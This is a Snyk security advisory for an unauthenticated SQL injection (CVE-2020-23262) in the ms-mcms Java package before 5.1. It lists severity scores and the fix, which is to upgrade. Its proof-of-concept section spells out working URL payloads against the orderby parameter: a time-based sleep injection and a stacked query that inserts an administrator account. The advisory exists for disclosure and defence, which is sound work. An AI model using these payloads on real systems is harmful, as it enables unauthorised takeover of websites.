Homepage
About Snyk

SQL Injection Affecting net.mingsoft:ms-mcms package, versions [,5.1)

0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.2% (58th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JAVA-NETMINGSOFT-2397345
  • published 10 Feb 2022
  • disclosed 9 Feb 2022
  • credit Unknown
Report a new vulnerability Found a mistake?

Introduced: 9 Feb 2022

CVE-2020-23262 Open this link in a new tab
CWE-89 Open this link in a new tab

How to fix?

Upgrade net.mingsoft:ms-mcms to version 5.1 or higher.

Overview

Affected versions of this package are vulnerable to SQL Injection via the orderby parameter which isn't handled correctly through the /mcms/view.do endpoint while unauthenticated.

PoC

  1. Enumerate an available ID using a tool likeBurp Intruder in the <ms-mcms address>:<port>/ms-mcms/mcms/view.do?id=<id number>.

1.1) Whenever an ID is unavailable you will receive an error, otherwise it'll be a status code 200.

  1. Once an ID is found, browse to: <ms-mcms address>:<port>/ms-mcms/mcms/view.do?id=<the id that is available>&&order=desc&orderby=content_category_id%60,(select%201%20from%20(select%20if(1=1,sleep(3),sleep(0)))a)%23

  2. It is also possible to inject an admin account: `:/ms-mcms/mcms/view.do?id=221&&order=desc&orderby=content_category_id%60;insert%20into%20manager%20(manager_name,manager_nickname,manager_password,manager_roleid)%20values%20('admin','admin','9d8622060de5f24937b60585c3f4d66b',48)%23

References